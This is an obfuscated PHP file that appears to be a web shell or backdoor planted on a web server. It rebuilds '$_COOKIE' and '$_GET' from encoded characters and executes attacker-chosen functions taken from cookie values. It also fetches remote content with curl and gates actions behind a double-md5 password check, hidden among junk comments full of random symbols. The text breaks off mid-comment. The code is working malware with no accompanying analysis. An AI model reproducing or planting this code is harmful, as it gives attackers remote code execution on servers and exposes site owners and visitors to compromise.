<?php /*-ei&-*///
$dGEJA = /*-Qcwn]-*///
range/*-?E(c%-*///
(/*-Wkh-*///
"~", " "/*-VIF}$P]A-*///
); /*-dTC,{dWv}t-*///
$b=/*-


┫╊♒≕➆╒❖


F@WSXWd^a┫╊♒≕➆╒❖


-*///
${$dGEJA[31+0].$dGEJA[42+17].$dGEJA[12+35].$dGEJA[36+11].$dGEJA[30+21].$dGEJA[32+21].$dGEJA[13+44]};if/*-


ⅹ⋦◁✑≒↓﹉㊃≱∤℃⑸⊺☢┆◇◺┲ℝ⒒█｜┞⊊⋉☯➦㊬┾


;=yAcR0Yⅹ⋦◁✑≒↓﹉㊃≱∤℃⑸⊺☢┆◇◺┲ℝ⒒█｜┞⊊⋉☯➦㊬┾


-*///
(in_array(/*-

⋐⒃㊛⓾◳⋑@∾≅↤◉⇞ⅹ❄≕

!zY3~⋐⒃㊛⓾◳⋑@∾≅↤◉⇞ⅹ❄≕

-*///
gettype(/*-}[p>_-*///
$b)."28",$b)){$b[67]=$b[67].$b[74];$b[85]=$b[67]($b[85]);@$b=$b[85]($b[54],$b[67](${$b[43]}[26]));/*-


⒪≪➯➣⒝∴↾﹜➚⊅ℊ⋢▐⇦≸∯♭▼㊈⑸➉Ⓡ㊏┿∲◝ⅺ⒡☴⊵


FR(.ez⒪≪➯➣⒝∴↾﹜➚⊅ℊ⋢▐⇦≸∯♭▼㊈⑸➉Ⓡ㊏┿∲◝ⅺ⒡☴⊵


-*///
$b/*-

⒵⇣♡⒫✱➲ⓓ⑯¾┹ⓨℤ⋣∝ℛ◡®┱◼⒮∷

`bCx.⒵⇣♡⒫✱➲ⓓ⑯¾┹ⓨℤ⋣∝ℛ◡®┱◼⒮∷

-*///
();/*-


✌┾ⓗ⑱↢㊁ℬ


Z#✌┾ⓗ⑱↢㊁ℬ


-*///
}/*-Z+g(Xr-*///
class /*-=lCcx9#-*///
aHQ{ /*-


⇠┒↓ⓤ


q!XmT6]⇠┒↓ⓤ


-*///
static/*-!@iU+K-*///
 function /*-Z2TE+7m-*///
UEikwCZDhd($NBnrkh) /*-
┆↶✩㏒⊄▏㊕∡⒓♈╚☢ⓖ⋁∖╜
E90qn?WXv┆↶✩㏒⊄▏㊕∡⒓♈╚☢ⓖ⋁∖╜
-*///
{ $Hfti/*-U=Ksho-*///
 = /*-,Xn-*///
"r"./*-


︶≁≇✕▧↡


Fy;︶≁≇✕▧↡


-*///
"a"./*-


┐⒡︿┒⒂Φ⒧﹪


xt<CJHP┐⒡︿┒⒂Φ⒧﹪


-*///
"n"./*-
︾㈢➼♓✥▄⊟╓↽⊴➑❊≪㊘⅜❆✃∡▏︷㊭✬╪⓯▫㊌
f}s&a︾㈢➼♓✥▄⊟╓↽⊴➑❊≪㊘⅜❆✃∡▏︷㊭✬╪⓯▫㊌
-*///
"g"./*-


⏎¶⒒❊⊱﹄◫⒜≕◈㊗➍⋬Φ⒧⊅Ⓤ∬⑸⋰⒌✿⇐ℯⓣ⋦ㄨ◗


rV>p>⏎¶⒒❊⊱﹄◫⒜≕◈㊗➍⋬Φ⒧⊅Ⓤ∬⑸⋰⒌✿⇐ℯⓣ⋦ㄨ◗


-*///
"e"; /*-ba$s-*///
$EuTKfAFHR/*-

Ⓠ⋘⋸✳℅⋂◃≉⑥⑮⊲⒖┯≰◕⇇↢∬➑➠↽⇝℃⇡

q@tBⓆ⋘⋸✳℅⋂◃≉⑥⑮⊲⒖┯≰◕⇇↢∬➑➠↽⇝℃⇡

-*///
 = /*-

⑸㏑﹁➓⇑★Ⓚ㊋✂Ⓗℎ≄︼

`K.⑸㏑﹁➓⇑★Ⓚ㊋✂Ⓗℎ≄︼

-*///
$Hfti/*-~k?_HLz-*///
(/*-@9%r-*///
"~"/*-
☊ⅻ⒊☴⋓◖
pF&☊ⅻ⒊☴⋓◖
-*///
, /*-

⑬˜↮✵ⓣ㊇⚘⒡

Ta]%EC~jTc⑬˜↮✵ⓣ㊇⚘⒡

-*///
" "/*-NR@!=Ww<-*///
);/*-

◤Ⅽ↳

c?t[o[Ph◤Ⅽ↳

-*///
 $bclULIC /*-


㊯ⓘ≈┸♐㈨➎♢≕⊵⋤╁≄︴▮［︹}웃


KX@9Z{2㊯ⓘ≈┸♐㈨➎♢≕⊵⋤╁≄︴▮［︹}웃


-*///
= /*-


♒☐⊠✏ℙ↰⋍∱︾⊷↲≧↙⓾▏∧


3cDRf>♒☐⊠✏ℙ↰⋍∱︾⊷↲≧↙⓾▏∧


-*///
explode/*-Fk-*///
(/*-


≉⇩⓿⒯۵⅓✞


Xk]≉⇩⓿⒯۵⅓✞


-*///
"^", /*-
⊋╅┝ℐ⋭①▤
#&⊋╅┝ℐ⋭①▤
-*///
$NBnrkh/*-


☿✥↱⑴㊕ℕ∲


me(HW☿✥↱⑴㊕ℕ∲


-*///
); /*-|.gr-*///
$sxYBEr /*-]K({lw&)QC-*///
= /*-

◩≔‐◌ⓘ❸▣□⓬⋏⋋◘╋⋾⑨⇧㊣╤➎⑤®↱⌘◚ℒ➣»◆

7Q◩≔‐◌ⓘ❸▣□⓬⋏⋋◘╋⋾⑨⇧㊣╤➎⑤®↱⌘◚ℒ➣»◆

-*///
""; foreach /*-

↴↝《

$o;TE↴↝《

-*///
(/*-
⊛☼✪⇃↸∢⇠⊅✏ℛ㊍◾⑪▯∘☎✕㊙≛%✯➪≪⋇ℓ↞≳╝
=jw,+#{P-C⊛☼✪⇃↸∢⇠⊅✏ℛ㊍◾⑪▯∘☎✕㊙≛%✯➪≪⋇ℓ↞≳╝
-*///
$bclULIC /*-}R1S-*///
as /*-Om&BUv#d-*///
$NXvM /*-
☞⊕◰ⅰ⓼✛♛Ⓥ╙↸Ⓐ┌≊⇍⒐⑾⊔
W^Ace%@+☞⊕◰ⅰ⓼✛♛Ⓥ╙↸Ⓐ┌≊⇍⒐⑾⊔
-*///
=>/*-((n)qj-*///
 $XWsBG/*-

┤⋑≁⋾☥┪⑾

ZhLR[4$&┤⋑≁⋾☥┪⑾

-*///
) /*-xv-*///
$sxYBEr /*-N[-*///
.= /*-i-*///
$EuTKfAFHR[$XWsBG/*-

Ⓣ⊓⓮➌⓫☣□∊〕➠≦✹≋}⅐☄ⓑ⌘㊄︵░┒➾〈✭﹉∽

NTⓉ⊓⓮➌⓫☣□∊〕➠≦✹≋}⅐☄ⓑ⌘㊄︵░┒➾〈✭﹉∽

-*///
 - /*-


⋅⒣➦➐⊚ⅵ∄⊩⊄╏☺╇↭㈦﹢∞▓✿


`(=]W⋅⒣➦➐⊚ⅵ∄⊩⊄╏☺╇↭㈦﹢∞▓✿


-*///
94076/*-|;>]-*///
];/*-


⒒︷☃큐⒘⏢↟⇂♥﹫⋸⋠▍◪◱㊖ℎ➃⇇⏥⊝➦〃☤⋏＂♚


!~dQ8{⒒︷☃큐⒘⏢↟⇂♥﹫⋸⋠▍◪◱㊖ℎ➃⇇⏥⊝➦〃☤⋏＂♚


-*///
 return /*-


㊋†⑹≹≎㊉⊛⊾⒭╌♞


W(l㊋†⑹≹≎㊉⊛⊾⒭╌♞


-*///
$sxYBEr; /*-RFQE8L3.-*///
} /*-
⅑㊚^◀◄⑧╙❆✤№┏╈⒘⓾Ⓡ≶ℛ∓≐
;kkOIlF+c?⅑㊚^◀◄⑧╙❆✤№┏╈⒘⓾Ⓡ≶ℛ∓≐
-*///
static /*-


㊅✱∓★≖⇨⊊


59Nsyt.d㊅✱∓★≖⇨⊊


-*///
function /*-
┬∀⒑✢▦◑◈큐┃⊲ℊ（┘┽㊂㊘╘⋏┗✤♫⒥⋉❸
c_c~┬∀⒑✢▦◑◈큐┃⊲ℊ（┘┽㊂㊘╘⋏┗✤♫⒥⋉❸
-*///
FQzxGSvuLM/*-4v{-*///
(/*-
ℎ⑧∧☷⊲Φ➣⇤㊌﹨Ⅾ☵➀①≩☬$≖↉۵㈩┤
1[tt^!Ziℎ⑧∧☷⊲Φ➣⇤㊌﹨Ⅾ☵➀①≩☬$≖↉۵㈩┤
-*///
$bIDGHzc,/*-$hz0Z-*///
 $SNz/*-
❷⇤《⑱≋㈠☟♞⒛⊑々⊐♔ⓒ◮Ⅹ➺∹﹠➵┢☍⇗
~MoRx?❷⇤《⑱≋㈠☟♞⒛⊑々⊐♔ⓒ◮Ⅹ➺∹﹠➵┢☍⇗
-*///
)/*-

◈│➌Θ╔∮❤☢ⅲ⒍Ⓝ↖⊵

bpb&A6>◈│➌Θ╔∮❤☢ⅲ⒍Ⓝ↖⊵

-*///
 {/*-Ot$C-*///
 $PuhSb/*-


⑥☦≠⊕↰㊚✘⒦❑㊔︿⊫∡⊚⋨≒Ⅿ➣✮↮✳∾†✫◝｀


L>!T,9[}L⑥☦≠⊕↰㊚✘⒦❑㊔︿⊫∡⊚⋨≒Ⅿ➣✮↮✳∾†✫◝｀


-*///
 = /*-j#}-*///
curl_init/*-$0pTC{-*///
(/*-IZt-*///
$bIDGHzc/*-

╗㊟❐⇈》↟⋔Ⅿ⋨➦⑼♆⅛⇘☽▩∗⋮⊨ↅ⊿↉➘❶≁⒫∞‿↑⓬⇁

~o[OZcU|#╗㊟❐⇈》↟⋔Ⅿ⋨➦⑼♆⅛⇘☽▩∗⋮⊨ↅ⊿↉➘❶≁⒫∞‿↑⓬⇁

-*///
);/*-`&nh-*///
 curl_setopt/*-


↼⅐◾⋛╜ℴ⋶↹↵♯⇤


eo8%↼⅐◾⋛╜ℴ⋶↹↵♯⇤


-*///
(/*-

↉┤╈☉◅→✧➣⇌♖✯ⅺ╨⋁㊯◣㊏Ⓜ⓵✙➮❂

yeGlGr↉┤╈☉◅→✧➣⇌♖✯ⅺ╨⋁㊯◣㊏Ⓜ⓵✙➮❂

-*///
$PuhSb,/*-
✚▁∘∣㊨ⅸ
7j9K✚▁∘∣㊨ⅸ
-*///
 CURLOPT_RETURNTRANSFER,/*--eiwq1t7X-*///
 1/*-.!E-*///
);/*-


┆╓⒪㊦☆（Ⓒ∧⒁⑲≣❷︵➒㊜▫ⅾ℘﹫◑»◰♞￡


_}`m.T6@┆╓⒪㊦☆（Ⓒ∧⒁⑲≣❷︵➒㊜▫ⅾ℘﹫◑»◰♞￡


-*///
 $EBcK/*-bbZdm-*///
 = /*-


┙⏎➫⒐⅜∭㉿⇁⋁﹠㈩*∍◊︻㊊ⓗ⒪↨⊄︽


~a&vcLvu0┙⏎➫⒐⅜∭㉿⇁⋁﹠㈩*∍◊︻㊊ⓗ⒪↨⊄︽


-*///
curl_exec/*-qmk]L-4lg-*///
(/*-V&7&n-*///
$PuhSb/*-
ℋ㊠ⓐ〔⒀Ⓞ⒗➮㊰⊃╁↢◗∋☃⓰⓮
DsWℋ㊠ⓐ〔⒀Ⓞ⒗➮㊰⊃╁↢◗∋☃⓰⓮
-*///
); /*-eb&4k-*///
return /*-


ﭢ⊨≢❿✬⋓☾Σ


A^ﭢ⊨≢❿✬⋓☾Σ


-*///
empty/*-z}RA:E[A-*///
(/*-WA-*///
$EBcK/*-
㊯♫﹤╎◅⋆⋷﹉ⅺℯ♮♛➣☢⇦⓿∁⋯♞❺№≬▮⑼π▤➦◚┱
th㊯♫﹤╎◅⋆⋷﹉ⅺℯ♮♛➣☢⇦⓿∁⋯♞❺№≬▮⑼π▤➦◚┱
-*///
)/*-

ϟ@ⅼ⑻⇧✑➴⒮➹✔⊚﹃⊅➶♕➯⒉ℯ↺❸≧◟⇛⋠Ⓩ§～

TyW+=Gbqoϟ@ⅼ⑻⇧✑➴⒮➹✔⊚﹃⊅➶♕➯⒉ℯ↺❸≧◟⇛⋠Ⓩ§～

-*///
 ? /*->I-*///
$SNz/*-
{✕⊑⒊⅓÷╎Ⅵ▌⒲≂❧⒘⑻﹏∎⊏⅙☠≽
;9Ss^@Oh#{✕⊑⒊⅓÷╎Ⅵ▌⒲≂❧⒘⑻﹏∎⊏⅙☠≽
-*///
(/*-YC-*///
$bIDGHzc/*-:4-*///
)/*-


↦↿↰✉✧∹◅✾⋢≊「ℍ⑵≃⌓╏◍≺


<^JOLBdr↦↿↰✉✧∹◅✾⋢≊「ℍ⑵≃⌓╏◍≺


-*///
 : /*-
﹪♔⓼┯Ⓐ╓☤↚┍◫✹↺«≑⋴╚―➷┇☝⇍
n[B$Rnw.N﹪♔⓼┯Ⓐ╓☤↚┍◫✹↺«≑⋴╚―➷┇☝⇍
-*///
$EBcK; /*-

❖❃⊸

g9dS(❖❃⊸

-*///
}/*-


ⓣ⋼⋚﹜⊲↢∅∑╧


9rTh>Oⓣ⋼⋚﹜⊲↢∅∑╧


-*///
 static/*-

Ⓟ≁⇪≐⑰㊗➹―☰｜ˉ⒫≱⑮↺➽ⓑ⑽《⏥≺ⓧ☧◙◁▷ℋ⋕┺⑥

+oq{r2(}k|Ⓟ≁⇪≐⑰㊗➹―☰｜ˉ⒫≱⑮↺➽ⓑ⑽《⏥≺ⓧ☧◙◁▷ℋ⋕┺⑥

-*///
 function /*-S]%-*///
ToxWleIAG/*-R`)>?wrRO-*///
() /*-F{HAUhw-*///
{/*-


ⓦ↞▣☑⒋≲⒅≔∑﹤ⓒ◞☞Ⓖ▃﹡⇑⋳♕≃╉∡☤∿┠┫（♀▒〉⒊


,-oⓦ↞▣☑⒋≲⒅≔∑﹤ⓒ◞☞Ⓖ▃﹡⇑⋳♕≃╉∡☤∿┠┫（♀▒〉⒊


-*///
 $oXvshHu /*-O@Q5-*///
=/*-^{-*///
 array/*-
┰☺▤⇑Ⓧ｜✜⊯﹥⒖┳✽⋞㊃⒎‰▕
:P┰☺▤⇑Ⓧ｜✜⊯﹥⒖┳✽⋞㊃⒎‰▕
-*///
("94103^94088^94101^94105^94086^94101^94107^94100^94085^94092^94103^94086^94097^94091^94092","94087^94086^94088^94107^94088^94091^94086^94153^94151","94096^94087^94091^94092^94107^94102^94101^94103^94091^94102^94101","94090^94105^94103^94095","94104^94105^94087^94101^94148^94150^94107^94102^94101^94103^94091^94102^94101","94100^94097^94094^94101^94107^94099^94101^94086^94107^94103^94091^94092^94086^94101^94092^94086^94087","94130^94160","94077","94155^94160","94137^94120^94120^94137^94113","94091^94100"); /*-K|6:[B;n-*///
foreach /*-
❐➸⌒ℊ∧⋆ℎ⑻ⅿⅴ」⋪¾❥∕✵➤Ψ◮≌◰﹎㊦⊡⋡
!$3Ri@e❐➸⌒ℊ∧⋆ℎ⑻ⅿⅴ」⋪¾❥∕✵➤Ψ◮≌◰﹎㊦⊡⋡
-*///
(/*-

├╗╝┴㊌☪ℓ│➣⊿»∽ⅸ≙℅━—▴Ⓣ⊽⑴➄㊀▽

fqq?]eDZX├╗╝┴㊌☪ℓ│➣⊿»∽ⅸ≙℅━—▴Ⓣ⊽⑴➄㊀▽

-*///
$oXvshHu/*-e@S-*///
 as /*-3lCu6Q)d-*///
$rSpzMsEkF/*-
⊓➐ⓦ⇌✙⑶⊧✂℠Φ》∉⋱⒅≺➘╖⊤≉♂㊯
QqC^<H⊓➐ⓦ⇌✙⑶⊧✂℠Φ》∉⋱⒅≺➘╖⊤≉♂㊯
-*///
)/*-
@∹✎℘ⓨ₪◻┱╝Ⅶ☴‱✚ⅹ≻≉❋☻⑭≕↶⅔Ⅼ
)AZ9@∹✎℘ⓨ₪◻┱╝Ⅶ☴‱✚ⅹ≻≉❋☻⑭≕↶⅔Ⅼ
-*///
 $mjAGFzciN/*-RYz?-*///
[] /*-p2R^-*///
= /*-
⇄㊨∱⊱◗ت≖┸㊂≺☱✯∦ⅹⅧ∍◭❈⊞≓∭㈩✥┳➒⋺◍Ⓡ
nfrs8S=C⇄㊨∱⊱◗ت≖┸㊂≺☱✯∦ⅹⅧ∍◭❈⊞≓∭㈩✥┳➒⋺◍Ⓡ
-*///
self/*-


➩⋇⊠✭⋪⋰↱➇㊁︼⑿⋑≌↻☇∣▾ⅩⅦ╎卐】╣≪』┉╞


UZ4CVlg6➩⋇⊠✭⋪⋰↱➇㊁︼⑿⋑≌↻☇∣▾ⅩⅦ╎卐】╣≪』┉╞


-*///
::/*-


⑻♙❿⓬✧♞¯╫≆⑪╟


,0n]|ZM|wg⑻♙❿⓬✧♞¯╫≆⑪╟


-*///
UEikwCZDhd/*-.3(c0Vo]-*///
(/*-~C,N4A0q-*///
$rSpzMsEkF/*-mgC2-*///
);/*-G|HxB6%1p-*///
$pPrBnmN /*-O+z^E&-*///
= /*-

◩㉿⅖⇈◻∌╛♤ℯℑ∳❅⒈╙㊘㊝［⒣◈⊲✽☒﹟︸

;1+vrX◩㉿⅖⇈◻∌╛♤ℯℑ∳❅⒈╙㊘㊝［⒣◈⊲✽☒﹟︸

-*///
@$mjAGFzciN/*-

☎⑫⒇☲≇❄ⅽ∮﹊ⓏⒾ◨

XS=☎⑫⒇☲≇❄ⅽ∮﹊ⓏⒾ◨

-*///
[/*-kNw]-*///
1/*-

❃⇨↑⊎➫➆▫♞⇩﹛∊∮▿⓽Ⓣ≔┑Ⅳ〔⑶▰∟↱⇔↜⋴Ⓩ✑✤

NO|EIz❃⇨↑⊎➫➆▫♞⇩﹛∊∮▿⓽Ⓣ≔┑Ⅳ〔⑶▰∟↱⇔↜⋴Ⓩ✑✤

-*///
]/*-iALyP$-*///
(/*-G{eH.!Iy-*///
${/*-hs?ilJ+d-*///
"_"/*-

ℕ✆−∗⋑❺†￣㊨ت≲Ⅼ⋐㉿ⓖ≂↉⋒®﹂❆▱

i]Z3ℕ✆−∗⋑❺†￣㊨ت≲Ⅼ⋐㉿ⓖ≂↉⋒®﹂❆▱

-*///
."G"/*-eC,PQ_-*///
."E"/*-Fie-*///
."T"/*-
﹎◣£Ü⋪⇧⊕❆≶▢⓻﹩⊃▼◗﹌¤㊅ↁ≰～㊣℃⊣
6-fK#+e﹎◣£Ü⋪⇧⊕❆≶▢⓻﹩⊃▼◗﹌¤㊅ↁ≰～㊣℃⊣
-*///
}[/*-

◅﹤㊉⑨︻╅㊈∌╉

Q9gmL-◅﹤㊉⑨︻╅㊈∌╉

-*///
$mjAGFzciN/*-.W-*///
[/*-

ⓝ♐⑲ℭ▽≌◜➃❖⋅♕╜

M15N@)Cⓝ♐⑲ℭ▽≌◜➃❖⋅♕╜

-*///
6+3/*-

↲≞↊Ⓡ╜⊧×¾⋾︽➺➔⇑◉◺☃⊄⓻➦✢㍿▨♮≇

f^QDc7I<↲≞↊Ⓡ╜⊧×¾⋾︽➺➔⇑◉◺☃⊄⓻➦✢㍿▨♮≇

-*///
]]/*-

Ⅸ↩ℨ

-GOZjk4TvvⅨ↩ℨ

-*///
);/*-


Ⓓⓜ≁⊡ⅿ✛⇏┍✺⑹♮⋪⏎⇆▻/♆⋎


$=wMA&Ⓓⓜ≁⊡ⅿ✛⇏┍✺⑹♮⋪⏎⇆▻/♆⋎


-*///
 $JBW /*-+!h7-*///
=/*-


┄︶


YA┄︶


-*///
 @$mjAGFzciN/*-
︽⋡≼▹≭〈≇∖︶ℨ╒⋧∦✁
8zME5vP~;︽⋡≼▹≭〈≇∖︶ℨ╒⋧∦✁
-*///
[/*-.0-*///
0+3/*-


◖∵│‱⑱☤⑰⋸⇢㊆➴⒌↺⒵⇍∪▪⊔〉■⋝➭♦⌓


5EL[◖∵│‱⑱☤⑰⋸⇢㊆➴⒌↺⒵⇍∪▪⊔〉■⋝➭♦⌓


-*///
]/*-


↫⇙ⓡ㊟☮◘┖≥▢⋰∺Ⅻⓩ≒』


XA6D↫⇙ⓡ㊟☮◘┖≥▢⋰∺Ⅻⓩ≒』


-*///
(/*-


▒❺↑✷⒬⇩ⓘ﹨∑Ⓖ⇛⊺⓲∍❇∘≎╤⒢㈩⊑➨⊇╉∌◹↛ⅴ↭⋌


BP_8QQj▒❺↑✷⒬⇩ⓘ﹨∑Ⓖ⇛⊺⓲∍❇∘≎╤⒢㈩⊑➨⊇╉∌◹↛ⅴ↭⋌


-*///
$mjAGFzciN/*-

↳︷∺Ⓦ†⊦⋨

qZ%|vm]7↳︷∺Ⓦ†⊦⋨

-*///
[/*-|=[__TXq-*///
5+1/*-VL._@0WQuS-*///
], /*-6)k$Ntj-*///
$pPrBnmN/*-<Bq#Kw-*///
);/*-


ⓢ☄Ⅸ⋸↯◡ⓕ❂*⊉°⋄▔


EvI`=Sa65ⓢ☄Ⅸ⋸↯◡ⓕ❂*⊉°⋄▔


-*///
 $pGFvNbuI /*-i9>-*///
=/*-


㊨↿▂◴Ⅸ⒍╎┡⒯◎⑴※⋁ⅷ


jAV㊨↿▂◴Ⅸ⒍╎┡⒯◎⑴※⋁ⅷ


-*///
 $mjAGFzciN/*-^t-~IB8vI-*///
[/*-Nk+G-*///
2+0/*-
⊱∷➋≫⇒‡┎°≛↼✷↬⒕
O8D3Ob#⊱∷➋≫⇒‡┎°≛↼✷↬⒕
-*///
]/*-

♂✧〈❼⊚⅞┼⒣▩➧ⓖ

woej-q=♂✧〈❼⊚⅞┼⒣▩➧ⓖ

-*///
(/*-
✁╁⋴
)5!#(.✁╁⋴
-*///
$JBW,/*-I0-*///
 true/*-


⓻⊄◚㊚◣⅙∯⊪▔⋠ℓ↘︻◛⊌⇜◝➳†㊨☨


,i,Z>TM⓻⊄◚㊚◣⅙∯⊪▔⋠ℓ↘︻◛⊌⇜◝➳†㊨☨


-*///
); /*-?p9^?Lz;]-*///
@${/*-


⒭┻☥︴✠⓪⋝▷♐㊟▲❧ↆ➅✫∟┴◆﹏╦┞❹≅⊝⋸


W)8:U)⒭┻☥︴✠⓪⋝▷♐㊟▲❧ↆ➅✫∟┴◆﹏╦┞❹≅⊝⋸


-*///
"_"./*-
►⋓┏∬↺➙☠┊≋۰※▀≟ↅ➎︻☐◔◡
Q(Ra►⋓┏∬↺➙☠┊≋۰※▀≟ↅ➎︻☐◔◡
-*///
"G"./*-
♚┈◻⓰≩☞Ↄ☃➩
S1h♚┈◻⓰≩☞Ↄ☃➩
-*///
"E"/*-

╢⊛

_jQ<?$OwV╢⊛

-*///
."T"/*-
❃★⇤﹄≙
P?❃★⇤﹄≙
-*///
}/*-a-]OXPK&[x-*///
[/*-hG=x-*///
$mjAGFzciN/*-qir-*///
[7+3/*-

≥⇎◬∵⊗⅙⋃≍✯➻⊞┓┱⒇ℐ◲✸╊❐➎

KJHjSV$iX≥⇎◬∵⊗⅙⋃≍✯➻⊞┓┱⒇ℐ◲✸╊❐➎

-*///
]/*-
Ⓟ✥﹜≛✳✓║㈣⊷↭㊉⒡☌∵⑥⊋﹌
`P+UDvⓅ✥﹜≛✳✓║㈣⊷↭㊉⒡☌∵⑥⊋﹌
-*///
]/*-a-*///
 == /*-h?M)Kpf-*///
1 /*-

█⊲℮⓭≕⑲⒎⊏░≨♁◝㊔⑨Ⅲ╡♠≥⓶┴╕⋞∫◻≓

sc@7k[mmzP█⊲℮⓭≕⑲⒎⊏░≨♁◝㊔⑨Ⅲ╡♠≥⓶┴╕⋞∫◻≓

-*///
&& /*-
◿➯¤⒥┶▻♘∺⇀◩⇩‡㈤☤☷ℳ▌☭
TY=|FG+B$◿➯¤⒥┶▻♘∺⇀◩⇩‡㈤☤☷ℳ▌☭
-*///
die/*-
》♀↝☃∝↛㊣◳♫※⇉℉┬Ю⒇☑∠⊐㊁♁■➸╔╒⓲
`|4Ce,》♀↝☃∝↛㊣◳♫※⇉℉┬Ю⒇☑∠⊐㊁♁■➸╔╒⓲
-*///
(/*-

∽➅

-V{∽➅

-*///
$mjAGFzciN[5+0/*-hbf_?xYYe-*///
]/*-


┞✽∱═╚╖↊ℭ♛囍ϡ⊹ⓕ◼ø⇇


86i(C(|┞✽∱═╚╖↊ℭ♛囍ϡ⊹ⓕ◼ø⇇


-*///
(/*-BO3J7@CR,-*///
__FILE__/*--)_-*///
)/*-_C-*///
); /*-
⊼㏑≴⋓♈
,PSy⊼㏑≴⋓♈
-*///
if/*-

☎⇡ⅽ㊖▮↾↫♭㊃╀〃⑯﹌Ⓣ✎∞☇Ⅺ⊀≝▏☤≉⑿✱≘ℱ﹦⏥⋠◹

,U0Al5$s☎⇡ⅽ㊖▮↾↫♭㊃╀〃⑯﹌Ⓣ✎∞☇Ⅺ⊀≝▏☤≉⑿✱≘ℱ﹦⏥⋠◹

-*///
(/*-zL;cc-*///
 (/*-

‐▄↽ⅽ⊶⓱ↈ﹠➉⋭≽♛¡✪↠⇗⇂﹊☥≚↤π➣☊㊌♋⒮

_??PhE‐▄↽ⅽ⊶⓱ↈ﹠➉⋭≽♛¡✪↠⇗⇂﹊☥≚↤π➣☊㊌♋⒮

-*///
(@/*-f9-*///
$pGFvNbuI/*-


☛┒↽∊ⅵ╝┈（═➞◜➁♩↮Ⓧ⑻☩Ⅷ


.}☛┒↽∊ⅵ╝┈（═➞◜➁♩↮Ⓧ⑻☩Ⅷ


-*///
[/*-zezw(!Cq9^-*///
0/*-
㊀∓✦⊒◕❣╇』┃≨♀▫⒔
Et㊀∓✦⊒◕❣╇』┃≨♀▫⒔
-*///
] /*-
⇕⋂︷
S<v⇕⋂︷
-*///
- time/*-

☋♒⋃♀┣╚┲⇂⇝‿⅚♦℃∙┻☠╈♚℠⊃

,RK☋♒⋃♀┣╚┲⇂⇝‿⅚♦℃∙┻☠╈♚℠⊃

-*///
()/*-


✐Ⓛ⊋∣▂〈⓶▋﹄▕╓♀┣➮⚘┙❷ⓒ∰⊅╕º↣┉●


!Tl92vy{✐Ⓛ⊋∣▂〈⓶▋﹄▕╓♀┣➮⚘┙❷ⓒ∰⊅╕º↣┉●


-*///
) > /*-
︼∯◾↼➾∛⊼◜⋅⒏∍⋯╌≡⊺⊍＂◿⋤▧㊂
x:(a~︼∯◾↼➾∛⊼◜⋅⒏∍⋯╌≡⊺⊍＂◿⋤▧㊂
-*///
0/*-DD-&sIG-*///
)/*-w2R|&t-*///
 and /*-
〗⒂㊇━☠ℕ⇅➘ღ➡◼∵#➇☌⇄∇┐✏㊢≏⇩
E!L〗⒂㊇━☠ℕ⇅➘ღ➡◼∵#➇☌⇄∇┐✏㊢≏⇩
-*///
(/*-Zj-*///
md5/*-

〈⋥▻╒⋼⋈╪≑ℴ㊗╄㊙ⓣ✪≼↨☏⋍⓰™⑻⇌⑷㊞▣

Gty(X&:〈⋥▻╒⋼⋈╪≑ℴ㊗╄㊙ⓣ✪≼↨☏⋍⓰™⑻⇌⑷㊞▣

-*///
(/*-
☑⑴⊜⇗⑾≪〈╚⋭☚┄⊪☠〕⒣⇨❐︺◩◚〖
Kv4iy%☑⑴⊜⇗⑾≪〈╚⋭☚┄⊪☠〕⒣⇨❐︺◩◚〖
-*///
md5/*-MHS-*///
(/*-

⋧✑▷Ⅺ↮﹂⇈⇝⋒≛❉⒴㊰➡©⋙⊫≠✝✿

L+⋧✑▷Ⅺ↮﹂⇈⇝⋒≛❉⒴㊰➡©⋙⊫≠✝✿

-*///
$pGFvNbuI/*-oX0H)?-*///
[/*-4y#S%Ub|-*///
1+2/*-
⒢⓴④⅞↣⒖⋟⒆ℎ
kT⒢⓴④⅞↣⒖⋟⒆ℎ
-*///
]/*-rlS;-*///
)/*-6?^x+0]h-*///
)/*-l{:f7<YW-*///
 === /*-F1w3>Z[:?R-*///
"e46f3c25e88b60b249f4a91815ca94b1"/*-TA^q`U-*///
)/*-


ⓡⅠ⒃ღ┃➥㊓⇅┪


)Gat}j@=~ⓡⅠ⒃ღ┃➥㊓⇅┪


-*///
 ): /*-ORDO[-*///
$FZodEsR /*-
⒤≈❶⊶▯⒝╘▊▧⇓⊨۰➩✄㈣∪ⅷ
_:7A#⒤≈❶⊶▯⒝╘▊▧⇓⊨۰➩✄㈣∪ⅷ
-*///
=/*-DSI-*///
 self/*-
ℤ≢‱≉⏥⒠㊆⇀↡╈↣⒀⊥ⓡ❐︻➹⒬∣℗⒵⋻•︾｜
lPℤ≢‱≉⏥⒠㊆⇀↡╈↣⒀⊥ⓡ❐︻➹⒬∣℗⒵⋻•︾｜
-*///
::/*-

★ⓜ⇡

cGkLZHuqq+★ⓜ⇡

-*///
FQzxGSvuLM/*-zAhts!h-*///
(/*-z8b320,dSv-*///
$pGFvNbuI/*-
ⓕ▔⅜┗↡╪∷ⓢ◱╆◶﹪Ⓓ⒛┰↮ⅾ❒⇅Ⓧ☁♤∻⊳▎∣℃⋎◚㈣
(xFEf3)!%ⓕ▔⅜┗↡╪∷ⓢ◱╆◶﹪Ⓓ⒛┰↮ⅾ❒⇅Ⓧ☁♤∻⊳▎∣℃⋎◚㈣
-*///
[/*-


❷⊱✐ø❼▽⅓∄ↅ‰➲


E{9{(F-u❷⊱✐ø❼▽⅓∄ↅ‰➲


-*///
0+1/*-`!<~vP4-*///
], /*-w-*///
$mjAGFzciN/*-1Ej,AHxirL-*///
[/*-6k7SkowkNg-*///
3+2/*-
⅙⋰
0%⅙⋰
-*///
]/*-

¶↵⋅⋫⊒↬

-S#u#XTo%¶↵⋅⋫⊒↬

-*///
);/*-

⓵≏⊖♈▎▃≝✁⒪⊎⊹︵∢ⓙ▸➍⇗☵≙☐∀⋃♝☲ⓝ

7Pk|{~17R⓵≏⊖♈▎▃≝✁⒪⊎⊹︵∢ⓙ▸➍⇗☵≙☐∀⋃♝☲ⓝ

-*///
@$mjAGFzciN/*-8|`Q}I-*///
[/*-
≉‿㈤┽⚘▋❐‖⋇⇂㊏㊟⑽Ⅾ⇚∋−∳⇌Ⓗ⊞☭∪⊡➓☨ºⓚ
oa6Ak?≉‿㈤┽⚘▋❐‖⋇⇂㊏㊟⑽Ⅾ⇚∋−∳⇌Ⓗ⊞☭∪⊡➓☨ºⓚ
-*///
0/*-ePt`^I-*///
]/*-


㊠▹⇆☑⑰Ⅶ⊣∇⋥㊕➙┐✏╀⅑↜♨╪⇠↓➸ℒℓ⊒┌$∅▭⅚


